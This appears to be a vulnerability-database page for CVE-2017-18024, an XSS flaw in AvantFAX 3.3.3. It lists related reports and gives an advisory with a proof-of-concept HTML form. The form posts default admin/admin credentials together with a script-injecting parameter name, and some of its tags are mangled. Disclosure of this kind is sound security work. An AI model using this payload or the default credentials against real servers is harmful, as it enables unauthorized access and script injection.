| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2017-18024 | 8 Sep 202001:19 | – | circl | |
| AvantFAX Cross-Site Scripting Vulnerability | 12 Jan 201800:00 | – | cnvd | |
| CVE-2017-18024 | 10 Jan 201818:00 | – | cve | |
| CVE-2017-18024 | 10 Jan 201818:00 | – | cvelist | |
| EUVD-2017-9164 | 7 Oct 202500:30 | – | euvd | |
| Endless Group: XSS on https://fax.pbx.itsendless.org/ (CVE-2017-18024) | 20 Aug 202020:56 | – | hackerone | |
| AvantFAX 3.3.3 - Cross-Site Scripting | 15 Jun 202607:03 | – | nuclei | |
| CVE-2017-18024 | 10 Jan 201818:29 | – | nvd | |
| CVE-2017-18024 | 10 Jan 201818:29 | – | osv | |
| Default credentials | 10 Jan 201818:29 | – | prion |
`# Title: AvantFAX 3.3.3 - XSS
# Author: Nassim Asrir
# Contact: [email protected]
# Vendor: https://www.officetracker.com/
# CVE: CVE-2017-18024
# Description
AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI,
as demonstrated by a parameter whose name contains a
SCRIPT element and whose value is 1.
------------------------------------------
# Details
The name of an arbitrarily supplied body parameter is copied into the
HTML document as plain text between tags. The payload
jlbqg<scriptalert(1)</scriptb7g0x was submitted in the name of an
arbitrarily supplied body parameter. This input was echoed
------------------------------------------
#Attack Type
Remote
------------------------------------------
# POC
<html>
<body
<scripthistory.pushState('', '', '/')</script
<form action="http://server/" method="POST"
<input type="hidden" name="username" value="admin" /
<input type="hidden" name="password" value="admin" /
<input type="hidden" name="_submit_check" value="1" /
<input type="hidden" name="jlbqg<script>alert(1)</script>b7g0x" value="1" /
<input type="submit" value="Submit request" /
</form
</body
</html
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation